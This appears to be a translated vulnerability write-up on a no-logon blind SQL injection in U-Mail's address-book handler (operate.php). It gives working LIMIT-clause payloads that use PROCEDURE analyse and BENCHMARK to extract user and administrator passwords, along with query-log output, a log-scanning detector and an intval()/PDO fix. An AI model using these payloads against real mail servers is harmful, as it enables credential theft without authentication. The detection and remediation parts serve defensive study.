U-Mail system injection 2 (SQL injection in the MySQL LIMIT clause, no logon required, with a script for getting user passwords)
The LIMIT clause parameter is not strictly filtered, which yields a blind SQL injection in MySQL. As a result, user names and passwords can be extracted without logging on.
Last time I only searched the client directory. Today I searched the fast directory and found another one.
Note: every function in the client directory can only be executed after logon. In the fast directory, some existing functions can be reached without logging on, although emails cannot be viewed.
The vulnerability is the same as the previous one, only in a different file. Access permission is not strictly checked here and the code can be reached by any user, so the SQL injection works without logon. sleep() cannot be used inside the LIMIT clause, so the delay is produced with BENCHMARK instead.
Vulnerable file: /fast/oab/module/operate.php. The relevant code is:

if (ACTION == "member-get") {
    $dept_id    = gss($_GET['dept_id']);
    $keyword    = gss($_GET['keyword']);
    $page       = $_GET['page'] ? gss($_GET['page']) : 1;
    // limit
    $limit      = $_GET['limit'] ? gss($_GET['limit']) : 25;   // user-controllable variable
    $orderby    = gss($_GET['orderby']);
    $is_reverse = gss($_GET['is_reverse']);
    $data_cache = $Department->getDepartmentByDomainID($domain_id, "dept_id, name, parent_id, `order`", 0);
    $department_list = create_array($data_cache, "dept_id", "name");
    $where = "";
    if ($dept_id && $dept_id != "-1") {
        $Tree = $Department->getTreeObject();
        $Tree->set_data_cache($data_cache);
        $Tree->sort_data(-1, 1);
        $dept_ids = $Tree->get_child_id($dept_id);
        $user_ids = $Department->getMailboxIDByDepartmentID($dept_ids, 0);
        $where = "t1.UserID IN (" . $user_ids . ")";
    }
    if ($keyword) {
        if ($where) {
            $where .= " AND ";
        }
        if (strpos($keyword, "@")) {
            $key_tmp = explode("@", $keyword);
            $keyword = $key_tmp[0];
        }
        $where .= "(t1.FullName LIKE \"%" . $keyword . "%\" OR t1.Mailbox LIKE \"%" . $keyword . "%\")";
    }
    // $orderby is mapped through a whitelist, so only these column names can reach the query
    switch ($orderby) {
        case "fullname":  $orderby = "t1.FullName";      break;
        case "mailbox":   $orderby = "t1.Mailbox";       break;
        case "sex":       $orderby = "t2.sex";           break;
        case "birthday":  $orderby = "t2.birthday";      break;
        case "mobile":    $orderby = "t2.mobil";         break;
        case "tel":       $orderby = "t2.teleextension"; break;
        case "position":  $orderby = "t2.headship";      break;
        case "group_num": $orderby = "t2.o_group";       break;
        case "email":     $orderby = "t1.Mailbox";       break;
        default:          $orderby = "";
    }
    // $page and $limit, by contrast, are passed straight into the query builder
    $arr_tmp = $Mailbox->getMailboxInfo($domain_id, $where, $page, $limit, $orderby, $is_reverse, 0);   // enters the function
    // ... (remainder of the handler not shown on the page)
}
$limit is user-controllable, which gives the injection. The exploitation process follows.
First, post data to the URL. (Note: this interface does not provide an arbitrary logon; afterwards only a few functions can be executed. But if one of those functions has an SQL defect, the result is an SQL injection that requires no logon. If a password could be updated through it, the defect could lead to obtaining any user's password; however, the reachable functions are limited and user emails cannot be viewed.)
After obtaining the session, request the following URL:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)
The resulting SQL statement, as recorded in the MySQL general query log, is:
150128 21:44:43     3142 Connect   umail@localhost on
                    3142 Query     SET NAMES 'UTF8'
                    3142 Init DB   umail
                    3142 Query     SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                    3142 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                                   FROM userlist as t1, mailuserinfo as t2
                                   WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                                   ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                    3142 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                                   FROM userlist as t1, mailuserinfo as t2
                                   WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                                   ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
                    3142 Quit
Because the error is not echoed back to the client, we fall back to blind injection. The request is:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select+password+from+userlist+where+userid=2),1,1))=97,BENCHMARK(50000000,SHA1(1)),1)))),1)
The resulting SQL statement is:
150128 21:47:16     3144 Connect   umail@localhost on
                    3144 Query     SET NAMES 'UTF8'
                    3144 Init DB   umail
                    3144 Query     SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                    3144 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                                   FROM userlist as t1, mailuserinfo as t2
                                   WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                                   ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                    3144 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                                   FROM userlist as t1, mailuserinfo as t2
                                   WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                                   ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
Injection successful.
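The injected requests leave a recognisable trace in the MySQL general query log: a LIMIT clause followed by something other than integer literals. The PHP script below is an added example, not code from the original post or from U-Mail; it scans constructed log lines modelled on the entries above and flags every Query entry whose LIMIT clause carries more than "n" or "n,m". The function names and the sample lines are assumptions made for this illustration.

```php
<?php
// Added example (not code from the original post or from U-Mail): scan MySQL
// general-log lines for LIMIT clauses that contain anything other than integer
// literals, which is how the injected requests above show up server-side.
// The sample lines below are constructed to mirror the log format in the post.

function limit_clause_is_suspicious($query)
{
    // Take everything after the first LIMIT keyword.
    if (!preg_match('/\bLIMIT\b(.*)$/is', $query, $m)) {
        return false;                        // no LIMIT clause at all
    }
    $tail = trim($m[1]);
    // A well-formed clause is "n", "n,m" or "n OFFSET m" and nothing else;
    // PROCEDURE ANALYSE(...), BENCHMARK(...) and the like fail this test.
    return !preg_match('/^\d+(\s*,\s*\d+)?(\s+OFFSET\s+\d+)?\s*;?$/i', $tail);
}

function scan_general_log(array $lines)
{
    $hits = [];
    foreach ($lines as $line) {
        // Entry layout: [yymmdd hh:mm:ss] <thread-id> <command> <argument>.
        // Only "Query" entries carry SQL; Connect, Init DB and Quit are skipped.
        if (!preg_match('/^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+Query\s+(.*)$/s', $line, $m)) {
            continue;
        }
        if (limit_clause_is_suspicious($m[2])) {
            $hits[] = ['thread' => (int) $m[1], 'query' => trim($m[2])];
        }
    }
    return $hits;
}

// Constructed sample: a normal paging request followed by the two injected ones.
$sample_log = [
    "150128 21:44:43\t 3142 Connect\tumail@localhost on",
    "\t\t 3142 Query\tSET NAMES 'UTF8'",
    "\t\t 3142 Init DB\tumail",
    "\t\t 3142 Query\tSELECT t1.UserID,t1.Mailbox FROM userlist as t1 WHERE t1.DomainID='1' ORDER BY t1.OrderNo DESC LIMIT 0,25",
    "\t\t 3142 Query\tSELECT t1.UserID,t1.Mailbox FROM userlist as t1 WHERE t1.DomainID='1' ORDER BY t1.OrderNo DESC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "\t\t 3144 Query\tSELECT t1.UserID,t1.Mailbox FROM userlist as t1 WHERE t1.DomainID='1' ORDER BY t1.OrderNo DESC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)",
    "\t\t 3144 Quit\t",
];

// The first SELECT (LIMIT 0,25) passes; the two PROCEDURE analyse(...) queries are reported.
foreach (scan_general_log($sample_log) as $hit) {
    printf("thread %d: suspicious LIMIT clause: %s\n", $hit['thread'], $hit['query']);
}
```

The check looks only at the text after the first LIMIT keyword, so a LIMIT inside a subquery or inside a string literal can produce a false positive; that is acceptable for a triage pass over a log but should be tightened before it drives alerting. The general log is expensive to keep on, so in practice the same test is better applied in the application's query builder or to a slow-query log, where a BENCHMARK-delayed statement will appear in any case.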
Therefore, by substituting a different subquery, a script can extract the passwords of the different user accounts:
# select+password+from+userlist+where+userid=2      system user
# select+password+from+web_usr+where+usr_code=1     administrator user
# select+password+from+web_usr+where+usr_code=2     admin user
Iterating over userid retrieves each user name and password.
Blind injection script (only half written; it does not use a binary-search method):
Local test:
And logon to the official site's management interface:
Solution: apply intval() to $limit (and likewise to $page) before they are passed to the query builder.
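To show what the intval() fix changes, here is an added PHP example (not U-Mail's own code) that places the vulnerable LIMIT construction beside a hardened version and runs the post's first probe through both. The function names build_limit_vulnerable(), build_limit_hardened() and fetch_mailbox_page(), the page-size bound of 200 and the PDO query are assumptions made for this illustration; the page's own getMailboxInfo() is not shown in the post, so the vulnerable builder only models the concatenation the log evidences.

```php
<?php
// Added example, not U-Mail's own code: the LIMIT construction that lets
// operate.php's $limit reach the query text, beside a hardened version that
// applies the intval() fix. The builder names, the page-size bound and the
// PDO helper are assumptions; the payload string is the post's first probe,
// constructed here as test input.

// Vulnerable pattern: whatever arrived in $_GET['limit'] is concatenated into SQL.
function build_limit_vulnerable($limit)
{
    return "LIMIT " . $limit;
}

// Hardened pattern: coerce both paging values to integers and bound them before
// they go anywhere near the query. intval() keeps only the leading digits of a
// string, so the injected tail after "1" is simply dropped.
function build_limit_hardened($page, $limit, $default = 25, $max = 200)
{
    $page  = max(1, intval($page));
    $limit = intval($limit);
    if ($limit < 1 || $limit > $max) {
        $limit = $default;           // reject zero, negative and absurd page sizes
    }
    $offset = ($page - 1) * $limit;
    return sprintf("LIMIT %d,%d", $offset, $limit);
}

// The same idea with PDO: LIMIT operands cannot be quoted strings, so bind them
// as integers after the intval() step (with emulated prepares a string-typed
// bind would be quoted and break the statement).
function fetch_mailbox_page(PDO $pdo, $domain_id, $page, $limit)
{
    $page   = max(1, intval($page));
    $limit  = max(1, min(200, intval($limit)));
    $offset = ($page - 1) * $limit;
    $sql = "SELECT t1.UserID, t1.Mailbox, t1.FullName FROM userlist AS t1"
         . " WHERE t1.DomainID = :domain ORDER BY t1.OrderNo DESC LIMIT :offset, :limit";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':domain', (int) $domain_id, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: the post's first probe, exactly as it would arrive via $_GET['limit'].
$payload = "1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)";

// The vulnerable builder emits the whole payload as part of the statement;
// the hardened builder keeps only the leading integer and derives the offset
// from $page; non-numeric or negative values fall back to the defaults.
echo build_limit_vulnerable($payload), "\n";
echo build_limit_hardened(1, $payload), "\n";
echo build_limit_hardened("abc", "-5"), "\n";
```

The switch() whitelist the original handler already applies to $orderby is the right pattern for column names, which cannot be bound as parameters; intval() (or an integer-typed bind) is its counterpart for the numeric LIMIT operands, and the two together remove both string-interpolated inputs from the query text.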